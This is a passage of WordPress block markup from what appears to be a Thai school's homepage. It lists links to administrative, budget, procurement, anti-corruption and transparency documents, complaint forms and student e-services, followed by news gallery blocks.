900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 